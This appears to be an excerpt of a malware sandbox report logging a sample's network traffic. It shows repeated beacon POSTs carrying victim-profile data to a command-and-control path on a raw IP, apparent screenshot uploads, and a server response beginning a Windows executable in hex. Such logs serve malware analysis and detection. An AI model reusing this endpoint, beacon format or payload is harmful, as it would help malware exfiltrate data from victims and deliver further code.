                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODMyNTM=Host: 193.56.146.174Content-Length: 83405Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODMyNTM=Host: 193.56.146.174Content-Length: 83405Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: POST /g84kvj4jck/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.56.146.174Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 35 30 26 73 64 3d 62 38 33 34 38 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 31 39 32 37 39 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.50&sd=b83488&os=1&bi=1&ar=0&pc=192799&un=user&dm=&av=13&lv=0&og=0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Nov 2022 15:58:18 GMTContent-Type: application/octet-streamContent-Length: 385536Last-Modified: Sat, 19 Nov 2022 15:55:01 GMTConnection: keep-aliveETag: "6378fc55-5e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 50 16 95 a1 31 78 c6 a1 31 78 c6 a1 31 78 c6 bf 63 ed c6 b5 31 78 c6 bf 63 fb c6 21 31 78 c6 bf 63 fc c6 8f 31 78 c6 86 f7 03 c6 a2 31 78 c6 a1 31 79 c6 db 31 78 c6 bf 63 f2 c6 a0 31 78 c6 bf 63 ec c6 a0 31 78 c6 bf 63 e9 c6 a0 31 78 c6 52 69 63 68 a1 31 78 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a5 e4 9d 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 2a 01 00 00 b6 44 00 00 00 00 00 9a 50 00 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 46 00 00 04 00 00 61 5a 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 2f 01 00 28 00 00 00 00 70 43 00 78 45 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 45 00 a8 0b 00 00 d0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 2d 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 52 28 01 00 00 10 00 00 00 2a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 2a 42 00 00 40 01 00 00 2a 02 00 00 2e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 45 02 00 00 70 43 00 00 46 02 00 00 58 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 92 42 00 00 00 c0 45 00 00 44 00 00 00 9e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
